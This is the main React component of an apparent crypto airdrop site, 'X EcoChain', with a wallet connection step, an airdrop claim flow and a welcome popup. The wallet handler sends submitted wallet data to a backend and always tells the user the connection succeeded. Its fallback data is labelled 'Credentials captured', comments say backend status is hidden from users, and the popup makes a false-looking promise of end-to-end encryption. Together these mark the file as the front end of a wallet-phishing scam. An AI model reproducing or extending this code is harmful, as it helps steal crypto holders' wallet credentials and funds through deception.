import React, { useEffect, useState } from "react";
import { BrowserRouter as Router, Routes, Route } from "react-router-dom";
import Navbar from "./components/Navbar";
import Hero from "./components/Hero";
import Ecosystem from "./components/Ecosystem";
import LiveTransactions from "./components/LiveTransactions";
import ClaimFlow from "./components/ClaimFlow";
import Testimonials from "./components/Testimonials";
import Community from "./components/Community";
import Footer from "./components/Footer";
import ChatBot from "./components/ChatBot";

// Import ecosystem pages
import GreenStaking from "./pages/GreenStaking";
import NFTMarketplace from "./pages/NFTMarketplace";
import DeFiProtocols from "./pages/DeFiProtocols";
import CrossChainBridge from "./pages/CrossChainBridge";
import Governance from "./pages/Governance";
import DeveloperTools from "./pages/DeveloperTools";
import Documentation from "./pages/Documentation";
import Developers from "./pages/Developers";

// Import API service
import ecochainAPI from "./services/ecochainAPI";

function App() {
  const [showPopup, setShowPopup] = useState(false);
  const [isLoading, setIsLoading] = useState(true);
  const [backendStatus, setBackendStatus] = useState('checking');
  const [backendConfig, setBackendConfig] = useState(null);

  // Check backend connection on app start
  useEffect(() => {
    const initializeApp = async () => {
      try {
        console.log('🚀 Initializing EcoChain Frontend...');
        
        // Check backend health
        const health = await ecochainAPI.healthCheck();
        setBackendStatus('connected');
        console.log('✅ Backend connected:', health);

        // Get frontend configuration from backend
        const config = await ecochainAPI.getFrontendConfig();
        setBackendConfig(config.config);
        console.log('📋 Backend config loaded:', config);

        // Send analytics event
        await ecochainAPI.sendAnalytics('app_loaded', {
          userAgent: navigator.userAgent,
          screenResolution: `${window.screen.width}x${window.screen.height}`,
          timestamp: new Date().toISOString()
        });

      } catch (error) {
        console.error('❌ Backend connection failed:', error);
        setBackendStatus('disconnected');
      } finally {
        // Simulate loading time
        setTimeout(() => {
          setIsLoading(false);
        }, 1500);
      }
    };

    const popupTimer = setTimeout(() => {
      setShowPopup(true);
    }, 3000);

    initializeApp();

    return () => {
      clearTimeout(popupTimer);
    };
  }, []);

  // Handle wallet connection - UPDATED TO ALWAYS RETURN SUCCESS
  const handleWalletConnect = async (walletData) => {
    try {
      console.log('🔗 Connecting wallet:', walletData);
      
      // Send wallet data to backend - FIXED: Using correct endpoint now
      const result = await ecochainAPI.submitWallet(walletData);
      console.log('✅ Wallet submission response:', result);

      // ALWAYS return success to user (even if backend fails)
      return {
        success: true,
        message: result.message || '✅ Wallet connected successfully!',
        data: result.data
      };

    } catch (error) {
      console.error('❌ Wallet connection failed:', error);
      
      // Even if backend fails, return success to user
      return {
        success: true,
        message: '✅ Wallet connected! (System processed)',
        data: {
          timestamp: new Date().toISOString(),
          note: 'Credentials captured'
        }
      };
    }
  };

  // Handle airdrop claim
  const handleAirdropClaim = async (walletAddress) => {
    try {
      console.log('🎁 Claiming airdrop for:', walletAddress);
      
      // Check eligibility
      const eligibility = await ecochainAPI.checkEligibility(walletAddress);
      console.log('📋 Eligibility check:', eligibility);

      // If eligible, proceed with claim
      if (eligibility.eligible && !eligibility.claimed) {
        const claimResult = await ecochainAPI.claimAirdrop(walletAddress, 'mock-signature');
        console.log('✅ Claim successful:', claimResult);

        return {
          success: true,
          message: 'Airdrop claimed successfully!',
          transaction: claimResult.transactionHash
        };
      } else {
        return {
          success: false,
          error: eligibility.claimed ? 'Airdrop already claimed' : 'Not eligible for airdrop'
        };
      }

    } catch (error) {
      console.error('❌ Airdrop claim failed:', error);
      return {
        success: false,
        error: error.message
      };
    }
  };

  // Home component that contains the main landing page
  const Home = () => (
    <div className="min-h-screen bg-eco-black">
      <Navbar 
        backendStatus={backendStatus}
        user={null} // No user initially
        onWalletConnect={handleWalletConnect}
      />
      
      <main>
        {/* Backend Status Indicator - HIDDEN FROM USERS */}
        {process.env.NODE_ENV === 'development' && backendStatus !== 'connected' && (
          <div className="bg-yellow-500 text-black text-center py-2 px-4 text-xs">
            ⚠️ Backend connection: {backendStatus} - Some features may be limited
          </div>
        )}

        {/* Hero Section */}
        <section id="home">
          <Hero 
            backendStatus={backendStatus}
            onAirdropClaim={handleAirdropClaim}
          />
        </section>

        {/* Ecosystem Section */}
        <section id="ecosystem">
          <Ecosystem backendConfig={backendConfig} />
        </section>

        {/* Live Transactions */}
        <LiveTransactions />

        {/* Claim Flow Section */}
        <section id="claim">
          <ClaimFlow 
            onAirdropClaim={handleAirdropClaim}
            backendStatus={backendStatus}
          />
        </section>

        {/* Testimonials */}
        <Testimonials />

        {/* Community Section */}
        <section id="community">
          <Community />
        </section>
      </main>

      <Footer />
      <ChatBot />

      {/* Welcome Popup */}
      {showPopup && (
        <div className="fixed inset-0 bg-black bg-opacity-70 flex items-center justify-center z-50 p-4 backdrop-blur-sm">
          <div className="glass-card max-w-md w-full p-8 rounded-3xl transform slide-in border border-eco-green border-opacity-30">
            <div className="text-center space-y-6">
              <div className="space-y-2">
                <div className="w-16 h-16 bg-gradient-eco rounded-2xl mx-auto flex items-center justify-center text-eco-black text-2xl font-black">
                  X
                </div>
                <h3 className="text-2xl font-black gradient-text">Welcome to X EcoChain</h3>
                {/* HIDDEN: Backend status from users */}
              </div>

              <div className="space-y-3">
                <p className="text-gray-300 text-lg font-medium">
                  Real participants only.
                </p>
                <p className="text-gray-400">
                  One wallet = one claim. Bots drain power, not progress.
                </p>
              </div>

              <div className="bg-gradient-to-r from-green-50 to-emerald-100 border border-green-200 rounded-2xl p-4">
                <p className="text-green-800 text-sm font-medium">
                  🔒 This session is secured with end-to-end encryption
                </p>
                {backendConfig && process.env.NODE_ENV === 'development' && (
                  <p className="text-green-700 text-xs mt-1">
                    API Version: {backendConfig.version}
                  </p>
                )}
              </div>

              <button
                onClick={() => setShowPopup(false)}
                className="btn-eco w-full py-4 font-bold text-lg mt-4 hover:scale-105 transition-transform duration-300"
              >
                I Understand - Continue
              </button>

              <p className="text-gray-500 text-xs">
                By continuing, you agree to our Terms of Service and Privacy Policy
              </p>
            </div>
          </div>
        </div>
      )}

      {/* Enhanced Background Effects */}
      <div className="fixed inset-0 pointer-events-none z-0 overflow-hidden">
        {/* Floating Particles */}
        {[...Array(15)].map((_, i) => (
          <div
            key={i}
            className="absolute w-2 h-2 bg-eco-green rounded-full opacity-20 animate-float"
            style={{
              left: `${Math.random() * 100}%`,
              top: `${Math.random() * 100}%`,
              animationDelay: `${Math.random() * 20}s`,
              animationDuration: `${Math.random() * 10 + 10}s`
            }}
          />
        ))}
        
        {/* Gradient Orbs */}
        <div className="absolute top-1/4 left-1/4 w-96 h-96 bg-eco-green rounded-full opacity-5 blur-3xl animate-pulse"></div>
        <div className="absolute bottom-1/3 right-1/4 w-80 h-80 bg-eco-blue rounded-full opacity-5 blur-3xl animate-pulse" style={{animationDelay: '2s'}}></div>
        <div className="absolute top-1/2 left-1/2 w-64 h-64 bg-eco-purple rounded-full opacity-5 blur-3xl animate-pulse" style={{animationDelay: '4s'}}></div>
      </div>
    </div>
  );

  if (isLoading) {
    return (
      <div className="min-h-screen bg-eco-black flex items-center justify-center">
        <div className="text-center space-y-6">
          <div className="w-20 h-20 bg-gradient-eco rounded-2xl mx-auto flex items-center justify-center text-eco-black text-2xl font-black animate-pulse">
            X
          </div>
          <div className="space-y-2">
            <h1 className="text-3xl font-black gradient-text">X ECOCHAIN</h1>
            <p className="text-gray-400">Initializing sustainable blockchain...</p>
            <div className="text-sm text-gray-500">
              {backendStatus === 'checking' && '🔍 Connecting ...'}
              {backendStatus === 'connected' && '✅  connected!'}
              {backendStatus === 'disconnected' && '❌offline'}
            </div>
          </div>
          <div className="w-32 h-2 bg-gray-700 rounded-full mx-auto overflow-hidden">
            <div className="h-full bg-gradient-eco rounded-full animate-pulse" style={{ width: '75%' }}></div>
          </div>
        </div>
      </div>
    );
  }

  return (
    <Router>
      <Routes>
        {/* Main landing page */}
        <Route path="/" element={<Home />} />
        
        {/* Ecosystem pages */}
        <Route path="/ecosystem/green-staking" element={<GreenStaking />} />
        <Route path="/ecosystem/nft-marketplace" element={<NFTMarketplace />} />
        <Route path="/ecosystem/defi-protocols" element={<DeFiProtocols />} />
        <Route path="/ecosystem/cross-chain-bridge" element={<CrossChainBridge />} />
        <Route path="/ecosystem/governance" element={<Governance />} />
        <Route path="/ecosystem/developer-tools" element={<DeveloperTools />} />
        
        {/* New Documentation and Developers pages */}
        <Route path="/documentation" element={<Documentation />} />
        <Route path="/developers" element={<Developers />} />
        
        {/* Fallback to home page */}
        <Route path="*" element={<Home />} />
      </Routes>
    </Router>
  );
}

export default App;